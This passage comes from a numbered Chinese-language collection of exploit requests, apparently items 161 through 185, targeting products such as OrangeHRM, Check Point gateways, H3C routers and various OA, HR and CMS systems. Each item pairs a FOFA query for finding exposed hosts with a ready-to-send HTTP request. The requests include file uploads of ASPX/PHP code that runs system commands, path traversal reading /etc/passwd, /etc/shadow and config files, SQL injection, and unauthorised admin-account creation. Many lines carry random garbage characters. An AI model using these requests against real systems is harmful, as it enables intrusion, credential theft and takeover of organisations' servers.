<UploadResume xmlns="http://tempuri.org/">; S" h/ y) {$ c* ^, }
<ip>1</ip>' y, ?' j% `/ K0 }
<fileName>../../../../dizxdell.aspx</fileName>: l$ @% P- ?0 ]0 p6 @4 P2 [
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>) g! @5 w8 Q, e2 G( N* B
<tag>3</tag>
, }9 L$ f! _# L1 t</UploadResume>- |& k$ ]8 M3 @' q: z+ e
</soap:Body>1 _$ b5 O- F: z. A: v" B
</soap:Envelope>0 E" e3 m& E7 h3 a- J4 v
7 z9 i0 O9 x5 _$ @
' r: Y( \/ O# |8 e' Uhttp://x.x.x.x/dizxdell.aspx& C. e9 z$ j, `! H, S
; ~+ q: C7 J0 D) \, y1 B3 T162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传/ r C9 c9 U& y+ j- d( C
FOFA: app="和丰山海-数字标牌"% M# m8 v" E/ r3 e: ]6 l
POST /QH.aspx HTTP/1.1
: h- m% }# ], x8 }% x& N" R. pHost: x.x.x.x8 ~0 ^' ~. ^$ t9 ~+ y' b* x; I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.03 s# \. x" O. m4 ^- |& o
Connection: close9 b/ D/ e* n* |/ `. y7 x. A
Content-Length: 5838 I8 H: M0 b" V" r/ _+ v
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey1 M5 {3 E+ e4 |
Accept-Encoding: gzip
- N' t+ I( g. ~$ c" ^4 y( Q+ A
" ~+ F3 `0 @8 L" U------WebKitFormBoundaryeegvclmyurlotuey
" d6 x; x6 |8 g) M) `Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
, N! l: _2 b% ~7 v" p8 SContent-Type: application/octet-stream
6 B5 J+ E' o" ^, F1 E9 ]4 n( O% I% u/ R7 c) s# Z: K
<% response.write("ujidwqfuuqjalgkvrpqy") %>
) E3 J, p+ b# [ h( X------WebKitFormBoundaryeegvclmyurlotuey( `" M) g+ j: O j( E0 R! Z F
Content-Disposition: form-data; name="action"
4 y* A W6 o$ [! i0 G& [& r- F) f6 Z" b) |5 W# @% M
upload8 s4 u, e9 B8 _7 \/ d0 \
------WebKitFormBoundaryeegvclmyurlotuey& o0 s4 {, x$ z/ P- l9 z$ {
Content-Disposition: form-data; name="responderId"
! p% f: w( b1 Y$ G; l5 O" [0 p5 M8 O. O+ P( `5 t6 m$ [
ResourceNewResponder ?- N3 L, V$ z: ^, `; v7 w) j- g5 p
------WebKitFormBoundaryeegvclmyurlotuey
! @) V4 K$ v1 O! A. pContent-Disposition: form-data; name="remotePath"' n) n% I+ Y7 e" l- T% V* s
: k; ]( B, k8 B% ^
/opt/resources
* Q/ e- z; B0 l7 s7 H! _7 S2 i4 O------WebKitFormBoundaryeegvclmyurlotuey--
+ ~1 n, f8 V5 s8 j& Z" c4 i& j, `8 u$ Q# D' F n
6 O: J! x1 j) \+ c5 H9 t+ D/ n
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
6 H/ P: Q& c. Y2 [1 z* n& a8 h4 s# T, _1 h# G( I
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传9 P9 _, [' a9 g4 R3 n% p
FOFA: icon_hash="-795291075"
5 h _, }/ D$ K) O. VPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1( M. Z# L! t4 ]3 A% y/ }
Host: x.x.x.x" |. V9 \ t1 D" q; m% Y( Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
# b4 d5 F$ o+ NConnection: close$ ~# F7 Q" x4 S9 d( ?& [
Content-Length: 293
# E( ? j% G5 r6 x) v1 oAccept: */*/ e/ E' Z2 Y* @- C! M
Accept-Encoding: gzip, deflate
. T% } Z2 M* D% x3 ~2 mAccept-Language: zh-CN,zh;q=0.95 o+ I8 T& P- w
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod% e4 s+ j; H4 s' r" y, ~" w
1 C; j5 T3 v/ e( U------iiqvnofupvhdyrcoqyuujyetjvqgocod
; ~# P! @6 p4 e) t; aContent-Disposition: form-data; name="name"6 o2 I! c2 Z0 y; u2 y8 a# a5 ~) z/ x2 n
0 U, e( n( K( K. h
1.php
$ J8 D$ o6 h/ a% s, {& G------iiqvnofupvhdyrcoqyuujyetjvqgocod
* U, _; v5 c. N9 Y) CContent-Disposition: form-data; name="upfile"; filename="1.php"
' V& r- C2 i4 C jContent-Type: image/jpeg
6 s7 F' J* }4 Y; N" I; q: b7 ^8 \" G# C9 p
rvjhvbhwwuooyiioxega
7 u4 b* w! d6 X' ^7 o( B------iiqvnofupvhdyrcoqyuujyetjvqgocod--
! q: D: [8 x( ]* F( V" f+ D) M
; t$ |0 S, h" B- P8 O
2 E5 J3 I+ w; }" q u164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
( v" q/ Y+ R( `FOFA: title="智慧综合管理平台登入"0 C/ j; ~( ~( q7 w( I! P; W4 r. \
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1( x, |; ^1 J. d; _$ n8 }4 Q$ }* `1 }
Host: x.x.x.x9 ]/ r# l! U6 ^$ z! B% @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0% Z& @. t9 [* g) ?0 c: C' K8 }$ ?
Content-Length: 288
/ ^" n) z$ r6 y9 l NAccept: application/json, text/javascript, */*; q=0.01+ M! {) A1 p- \; Q/ V* Y4 T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,+ y" }4 p, s+ U y7 ]8 O) J
Connection: close
) J- ^7 F+ t& t3 @Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl' ^6 {, T" B# d2 ~
X-Requested-With: XMLHttpRequest; B( K; v: A1 y- Q
Accept-Encoding: gzip
: a, H5 m, N4 I* v0 g, {0 r( `. g0 o
------dqdaieopnozbkapjacdbdthlvtlyl
- V o B0 I, z; FContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"* y$ P) A" f- ?
Content-Type: image/jpeg
3 l+ [, e# w; X% O
' w* f6 m# { A a; l# w<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
& b9 I$ q- w* ^- K8 i( u------dqdaieopnozbkapjacdbdthlvtlyl--
1 `. n, z* O/ s3 I K
5 ~+ i' c$ h; k6 i7 }" e, H+ i7 G# H! p" T' J4 g9 h
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
) L2 U5 i, L1 n8 l) ~! Z! F$ W8 n9 M" z
165. OrangeHRM 3.3.3 SQL 注入' T9 C% s) g% @, F4 p; Z! R
CVE-2024-364280 f! N' ~( Y" K: L: }
FOFA: app="OrangeHRM-产品"
, u% J/ _0 F% e7 [# q+ k- KURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))& v6 Z4 p X8 K0 M" I, N
! w' K+ t0 [7 G7 p; r9 U& b0 z R
) v& P- q. k/ M% e7 z% w# Q8 X+ {; p166. 中成科信票务管理平台SeatMapHandler SQL注入# z, k4 T9 ?9 a: U0 H8 T% C
FOFA:body="技术支持:北京中成科信科技发展有限公司"
j0 _- w- I. F) \+ S9 F A: zPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
2 f' W4 E' R: ?8 O1 o5 h6 j1 BHost:
1 r1 [4 Z q) S8 U8 e( cPragma: no-cache6 j- A! j5 g( _' [" o
Cache-Control: no-cache3 y% r& x. A& r& v8 O5 R6 J: P, `6 g
Upgrade-Insecure-Requests: 1
; F: o3 z* R9 o1 x, AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36. I, m' Q9 v$ s& J0 l) f8 Z8 f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- k0 H0 I- |# r" Z E' T( R8 P
Accept-Encoding: gzip, deflate! }2 u' ~( i e
Accept-Language: zh-CN,zh;q=0.9,en;q=0.85 @( y2 g5 n$ ~: W8 \2 K1 f
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE; d1 b) z5 O3 u/ n
Connection: close# o* _* Q8 C! H( J5 M4 H0 c- U
Content-Type: application/x-www-form-urlencoded
8 a8 g0 R' b" g* ^3 R% JContent-Length: 89
, `! h) \! m. O- g1 T9 R( @3 b" }- H* r" `% ^
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
u# |4 B5 a" L$ R4 h* N2 n1 T
; K* W+ R9 ?/ x: J9 D. f3 F$ f% y+ Q' k5 R2 i$ U
167. 精益价值管理系统 DownLoad.aspx任意文件读取6 I$ S2 v& S( x. [3 B
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
, F+ [( Z' d* pGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1- k! z$ s7 S A
Host:7 Z: Y% f! f0 @0 n/ N: _( w8 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ ~6 g* P/ L" S2 L9 ^Content-Type: application/x-www-form-urlencoded
/ a! j$ @0 r5 i3 lAccept-Encoding: gzip, deflate
4 w4 _" g. u( U" O% zAccept: */*/ t+ D0 y3 I- m/ h F9 [ k
Connection: keep-alive
7 p$ r& ^) l7 H9 @
# p, Y' E2 x3 l- ~
5 c9 a* K# L+ N( O; y168. 宏景EHR OutputCode 任意文件读取/ @# X* b7 _7 [5 l( Q/ r. A
FOFA:app="HJSOFT-HCM"# ?- a6 q( o8 u9 \
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
* B5 T3 T5 \. h, j) ?Host: your-ip0 ?( y7 U; v' b, E4 g9 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
# R/ T! L0 u H) ^/ nContent-Type: application/x-www-form-urlencoded
% a! H2 t5 a) V; o! QConnection: close) u, a! e# V) G3 I* n9 l
, `8 K1 Q0 n. g' O+ J3 H5 k6 V( E: f) b& \6 P/ g6 ?) N1 Q
" u* e7 ?& ~' m! A* O( Y+ Z/ N169. 宏景EHR downlawbase SQL注入
4 u* t: g/ J( _6 U2 T- V$ \; h8 FFOFA:app="HJSOFT-HCM"- h% F" @2 _# ]# b. e
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1* {! M, k0 H5 @: V ~# K1 [9 Z: f9 t: Q
Host: your-ip
7 U% J7 H" X) k% e; a% |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 K2 W# H% K% D# b3 Y9 M
Accept: */*! a/ s* K9 c: G$ b* ?
Accept-Encoding: gzip, deflate; e* S5 s d0 A
Connection: close8 t+ q+ }: v D% b
: l5 T# ~/ Z" I R* H! \
. v- A! H, T7 q6 @1 @/ }6 {2 N
4 [" w" n9 i# y) r2 ~9 p8 {# y- p5 ~. w170. 宏景EHR DisplayExcelCustomReport 任意文件读取
: | w3 u6 q1 r1 LFOFA:body="/general/sys/hjaxmanage.js": Q! m: ^* p* h' v* d" f6 V
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
" Y% g- \5 d% U; g$ h6 FHost: balalanengliang
* q1 E: v, c* T4 ~( b) ^User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 ], k, d, T7 L: NContent-Type: application/x-www-form-urlencoded) H x3 [$ W1 f
& j# X4 S; i% M! R0 ]
filename=../webapps/ROOT/WEB-INF/web.xml
; ~* u. }$ I7 c7 X2 e7 W8 C. d: U; n3 Z S% K" i$ L
6 o4 B* ?: j' g0 D6 m
171. 通天星CMSV6车载定位监控平台 SQL注入) E- A& r0 n* `: ]/ e
FOFA:body="/808gps/"
# C4 _5 B1 _$ P/ B5 sGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
& e8 P+ w8 t* OHost: your-ip
6 M2 e+ D( O% n x6 N1 V; QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0% |/ _ g) w4 r2 k' {0 `; N$ ]
Accept: */*: H' D3 w L0 ]# |+ N! x1 J7 Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# r+ |$ r0 |8 U
Accept-Encoding: gzip, deflate
% u$ t$ o0 y$ y$ LConnection: close
! O9 H* G c1 ?/ H1 x8 O8 e- P ^( _6 D9 N- @. B2 d
3 o/ L, j0 `, ], c5 A# M) M
2 f+ O4 I, C, h) u, O172. DT-高清车牌识别摄像机任意文件读取
7 y4 l- p5 D! u' ]4 b% qFOFA:app="DT-高清车牌识别摄像机"
# y1 A _* B& Z& [- M! ^5 kGET /../../../../etc/passwd HTTP/1.1
}- C$ ?3 M! C3 ?, m( K/ wHost: your-ip" |7 p. b* _. ]& \& `/ P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 W3 }, [0 e+ I0 y$ U
Accept-Encoding: gzip, deflate, d: i* E" b) {7 M( {1 z
Accept: */*# b% O3 d7 h: N
Connection: keep-alive) F; p( F3 x6 c; L
3 t! T: t' g& v
; B6 }# a4 k; U2 b" r$ H0 l1 I
1 K) H* T4 U5 l9 g3 F$ A9 W4 e5 Q/ U173. Check Point 安全网关任意文件读取
) K" F2 c8 w2 B! Z% cCVE-2024-24919
* e0 J; M5 D* ~7 l* G! s. A7 vFOFA:app="Check_Point-SSL-Network-Extender"8 o j% T$ b. S4 m' k# W
POST /clients/MyCRL HTTP/1.1
3 \5 [( X; r+ pHost: your-ip" \3 s) L W. ~. P: E: x
Content-Type: application/x-www-form-urlencoded
9 I r; R. N+ G; s8 u( T$ _5 _* h2 E) ? [0 O9 g2 l Q7 q1 ?
aCSHELL/../../../../../../../etc/shadow6 Z% L( c% k, E( U% }: h+ J
T0 u% V; G( p
* k E7 ~- S) O: [6 s; \4 \
$ `2 k4 B4 V: z o0 M* l" _
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
: g1 x b% g9 J( JFOFA:app="金和网络-金和OA". ~ ?( J B9 o
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1- o& s6 Y. @$ }: h0 S; B
Host: your-ip
2 I1 v4 @( j3 Q: v2 O- XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.360 h9 G* e& r( E1 a. d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 P* Y2 S- k0 B3 ?" R0 tAccept-Encoding: gzip, deflate, br
7 ^# N$ ]. s6 T9 g0 k$ Y* gAccept-Language: zh-CN,zh;q=0.97 s7 U' H# ^2 I9 X8 ~( z
Connection: close
# I( U9 `' L* F7 `, O" _* p; X, b2 q+ x
" R- c8 J! L1 N- Q9 p4 e) L, z' X0 T' j& G3 c1 C; l1 |' o) r) s& ^2 g
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
8 V& O( Q1 }$ X8 VFOFA:app="金和网络-金和OA"$ R6 p! [3 @7 s, s6 y9 y0 P# Z
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1) c& o' W0 |$ H, a9 d/ d
Host:$ \( a% E- b% d; d* _
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
4 ^; W% f5 a8 ^5 }- R5 Q& N' EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: i- V1 E* |; Y; x& V+ T! s2 h
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, s# Y% a: v3 |
Accept-Encoding: gzip, deflate
8 p0 O ?; r: v- o7 W8 JConnection: close
0 z- P9 _' L% D! M4 t' TUpgrade-Insecure-Requests: 16 b) ?$ S$ A. `' y8 u, u$ Y; @: j
/ a* L. I1 B# w$ M' V0 P
4 k3 i+ H0 Z) [) [3 `/ G3 h176. 电信网关配置管理系统 rewrite.php 文件上传
+ |8 D; K, G S, [3 W SFOFA:body="img/login_bg3.png" && body="系统登录"5 H5 T% b9 x2 l5 s: O2 W" ?
POST /manager/teletext/material/rewrite.php HTTP/1.1
/ T1 k# U: b7 o$ wHost: your-ip
' b; }1 `8 @; f2 g8 v9 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.06 k5 h5 p: Z4 Z& U8 C- i; d
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT" }$ L" o1 i" R0 Z1 J3 P
Connection: close) {: m, P9 J/ L9 ]/ x. b! r4 m5 S! O; B
4 y1 o+ y3 I) Y2 o------WebKitFormBoundaryOKldnDPT* }; g; D# q9 `' I! l. M
Content-Disposition: form-data; name="tmp_name"; filename="test.php"9 h: W8 ~7 f4 x" X% i0 L a# \
Content-Type: image/png
( n$ W" I# r2 c- j+ h. K7 |
3 _. ?$ f: ~. e$ R<?php system("cat /etc/passwd");unlink(__FILE__);?>! s$ O, X' X9 @6 R/ u
------WebKitFormBoundaryOKldnDPT/ ?! |. C( ?) S/ P
Content-Disposition: form-data; name="uploadtime"' U( z0 a' @1 A+ _9 L) j. i
5 K& M2 y( b0 e# z
( Q: n5 Q6 `$ z- q& W R' k------WebKitFormBoundaryOKldnDPT--
( L; W( b h4 R) B5 d7 n/ |7 z+ \8 R# m6 X$ Z3 I
4 k" ?5 g% D- n* f% i
. f9 ]/ O, L! @ k! c& `, I& y177. H3C路由器敏感信息泄露( S+ Q: k2 P9 B7 k
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
7 a- i% t6 a7 S A6 G/userLogin.asp/../actionpolicy_status/../M60.cfg
" U0 M8 I& H) P3 Y/userLogin.asp/../actionpolicy_status/../GR8300.cfg9 w) x$ J( u+ L6 n& \
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
) r- F! S' Q5 n4 |' ?/userLogin.asp/../actionpolicy_status/../GR3200.cfg3 Y+ c N5 k0 D
/userLogin.asp/../actionpolicy_status/../GR2200.cfg9 l8 ^3 r# s% _) R
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
' S' H5 l: s; _3 K t- j/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
+ K, g6 E* v1 ` }/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg5 E r1 d2 s3 U8 ~
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
- m* e! j6 h, w# r4 p/userLogin.asp/../actionpolicy_status/../ER5200.cfg$ r2 N5 _# d1 ~3 l. `
/userLogin.asp/../actionpolicy_status/../ER5100.cfg# H+ Y1 c! l! t
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg4 f3 N' Q6 Z" b: v6 n$ Z& M. m
/userLogin.asp/../actionpolicy_status/../ER3260.cfg9 ]/ i8 r; L4 ^$ T8 D# m
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg9 b* Y8 m! K# |" w2 I1 Q
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/ [) p, q9 }) ]/ t. W$ c- e0 {/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
# U( f* W* Q3 g- K/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
' e p, B @" i/ ]8 c, Y a& y# O/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg7 P& x- a9 W% i" e6 X: o# C
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
* Q1 l$ f3 G& ?3 h/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
9 P2 i* L `0 M6 s2 `7 _5 L/ t0 p5 b9 W4 b4 k |# g3 [8 a
; i) _. c$ X2 b3 s7 A178. H3C校园网自助服务系统-flexfileupload-任意文件上传
K5 y5 b+ s' k! R' U& BFOFA:header="/selfservice"
" f+ G* g8 h/ `7 n6 r; iPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1- [* Z% [& V7 ?! i3 h1 G
Host:, j# s9 k' @3 {2 R: f3 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36* w" y4 v3 }/ b4 q& a4 C- Q) c8 G( ] ^
Content-Length: 252
_3 i7 a: |9 ?, tAccept-Encoding: gzip, deflate5 g& d, E. o* B( S1 l
Connection: close( M8 l! g0 c7 c- V5 N) A
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l/ r( \# n! ^8 J' C
-----------------aqutkea7vvanpqy3rh2l
2 U9 u; G6 J$ y+ ^Content-Disposition: form-data; name="12234.txt"; filename="12234"8 c' C# G' ^/ ~0 q
Content-Type: application/octet-stream
$ {7 ?2 k6 \3 X$ |Content-Length: 255% K, q3 ]/ g/ w2 T
# \1 ], @$ S( m12234% b _8 R, m q. E
-----------------aqutkea7vvanpqy3rh2l--$ s1 }) f' O! f ]+ D
n5 Q7 A4 P: O" S4 _3 Y/ u
2 o7 J. y' z, D* q# }' Z8 J/ a% d" nGET /imc/primepush/%2e%2e/flex/12234.txt$ S" e$ E- X4 m" E8 ~% ~' k$ B
2 B1 _$ K+ |" k
" Y: P& d; c& x" F7 x u
179. 建文工程管理系统存在任意文件读取6 B) E% z d: L+ ?1 k9 T& ^
POST /Common/DownLoad2.aspx HTTP/1.1. s) n" Z# r% b& s
Host: {{Hostname}}
& T$ K) v- | c" d$ p: ]Content-Type: application/x-www-form-urlencoded$ k4 g6 Y( B. M- D, l; O
User-Agent: Mozilla/5.00 G# {" T5 X0 u3 F [& ^, H& o, I( \
' J9 P" v) j% X# }
path=../log4net.config&Name=" h3 T9 d2 n. J1 U
4 g. m6 F- |/ V% r; X' p9 u9 {5 {8 g. \4 ~5 B
180. 帮管客 CRM jiliyu SQL注入
2 p2 L+ |1 ?% [( O! v: ~FOFA:app="帮管客-CRM"
1 T$ l$ H& o. ~! {! RGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
+ A5 ~# J! S1 t: r$ b7 h' t# C6 JHost: your-ip
5 m7 [8 p/ M9 l! ?# d( W; p8 K" g$ ]' XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36/ K _) G& z5 S: C% p* H7 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& }2 q5 M- ?( `1 [. z' Z+ M! }. h
Accept-Encoding: gzip, deflate% S" F. G* m% n3 }" z( Z- M
Accept-Language: zh-CN,zh;q=0.9
0 a# L" |+ @& `4 _( B0 j& G9 {$ nConnection: close
3 ]# ^% a, r$ F" B, u: x5 E3 X9 R: e+ N
8 K8 H/ P7 J1 ^& z) |0 P0 p
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入: g3 x# [0 ^) m4 U6 |
FOFA:"PDCA/js/_publicCom.js"
2 y* w9 B" V1 j0 Q( UPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
% t- A: e( l7 |: fHost: your-ip b3 r3 I- u: _- d" p0 F( }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36/ H: |0 f3 g* s8 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 F9 t* e4 h8 h, W; I1 z; nAccept-Encoding: gzip, deflate, br& x- D# |; a g, k
Accept-Language: zh-CN,zh;q=0.9
* Z2 \! @# [2 {, P9 h$ ]* D% xConnection: close. L2 p; |/ ~; T# ~" V% {& Z( g* m7 h: t) @
Content-Type: application/x-www-form-urlencoded! N, S) M5 L3 _% ^$ G
9 f1 D) W5 o$ `8 w. Z# x K9 I, u: e3 F; v4 z* c8 _
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20- E2 D5 J; T P! B/ O. D5 @, c
1 \# _+ i$ F3 Y2 \9 X' }4 X, `# L
, D# g2 B" Q2 E/ ^& I, s182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建" D7 @6 r2 _: ?* F9 ^! O% x
FOFA:"PDCA/js/_publicCom.js"6 r% i3 c M: r( t
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1* B3 M# C1 [* ~" f7 k
Host: your-ip, N% l. B" ]- z5 G$ N" ]0 {# [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36# D' P: {- _* ~) y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( K+ i% K$ ? B4 ?/ y# z; ^
Accept-Encoding: gzip, deflate, br
/ g! e" w* \! `Accept-Language: zh-CN,zh;q=0.9
9 B! v. _ w3 |: {' fConnection: close
5 [" y4 }( W3 V _! \5 k) n, mContent-Type: application/x-www-form-urlencoded$ _ E7 l. ^0 O5 X" Z/ V9 s
. I6 |2 n+ Z p5 Y5 L# d3 Z
8 A' W( _% C0 h9 U$ ^; n
username=test1234&pwd=test1234&savedays=10 _! m% f$ f7 i) Y8 @3 M
3 R. i* w, ?. B9 Z. f' B3 I+ T
7 h# k$ ~, N# b, @8 y/ D183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入. Y. z/ m5 `/ `
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
! f( z8 H h y. y. b. aGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
' d- u0 F' s: Y1 [! g5 }Host: your-ip
" q/ G w* c, Y8 SUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36% f) F/ }. L: E# d
Accept-Charset: utf-8; ]5 N& R3 G: t; E2 F
Accept-Encoding: gzip, deflate# H) f( H9 @2 R8 B9 W3 L
Connection: close
' u, K9 ~% i: o7 x" C
6 }. f# h- H+ ?$ @" S/ P2 K# r/ }/ @+ m5 J& E. ~
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加' m) \; O' }* D) j$ o5 m4 \
FOFA:server="SunFull-Webs"
; E$ F( M9 `/ \# ~6 R8 JPOST /soap/AddUser HTTP/1.1
. q0 k/ y' E! [5 M3 f6 XHost: your-ip$ k/ A& I0 @7 ?4 i
Accept-Encoding: gzip, deflate
8 D! G0 N D6 k: M h6 P7 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.01 t3 L1 V c* b/ C1 f
Accept: application/xml, text/xml, */*; q=0.01
/ N0 L ?; j. M' A n' O! G6 \/ x/ |Content-Type: text/xml; charset=utf-8' h e- E4 j9 R; }, Q& q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! {$ @, c" A$ E& _4 L _- YX-Requested-With: XMLHttpRequest
" s9 s. U& M% V
& y6 R% U4 X( h- b% H
. C$ Y- K/ D W) ]2 o' xinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
5 o C- z9 U# y7 A2 I/ u B H6 G, \' f- g% q7 p
$ l# u: G3 f' E2 s$ Z185. 瑞友天翼应用虚拟化系统SQL注入
